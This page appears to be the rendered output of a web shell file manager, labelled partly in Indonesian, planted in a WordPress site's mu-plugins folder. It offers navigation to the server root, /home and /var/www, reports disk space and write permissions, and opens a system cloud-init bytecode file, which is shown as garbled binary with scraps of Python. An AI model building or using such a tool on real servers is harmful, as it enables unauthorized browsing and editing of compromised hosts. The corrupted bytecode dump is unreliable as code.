📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
lib
›
python3.9
›
site-packages
›
cloudinit
›
net
›
📁 __pycache__
📍
Lokasi:
/usr/lib/python3.9/site-packages/cloudinit/net/__pycache__
💾
Free:
45.9 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: openbsd.cpython-39.opt-1.pyc
a '�Dg� � @ sZ d dl Z d dlZd dlZd dlmZmZmZ e �e�Z G dd� dejj j�Zddd�Z dS )� N)�net�subp�utilc @ s( e Zd Zd dd�Zd dd�Zdd� ZdS )�RendererNc C s� | j �� D ]�\}}d�|�}t�| j|�}|| �� v r<d}nlt|t�r�zdj|d |d d�}W n t y~ t �d|� Y n0 |�d�}|r�|d | 7 }|d | j 7 }t�||� q d S )Nzetc/hostname.{}zdhcp zinet {address} {netmask}�address�netmask)r r z#Invalid static configuration for %s�mtuz mtu %d� )Zinterface_configurations�items�formatr �target_path�target�dhcp_interfaces� isinstance�dict�KeyError�LOG�error�get�interface_routesr � write_file)�selfr Zdevice_name�v�if_file�fn�contentr � r �9/usr/lib/python3.9/site-packages/cloudinit/net/openbsd.py�write_config s&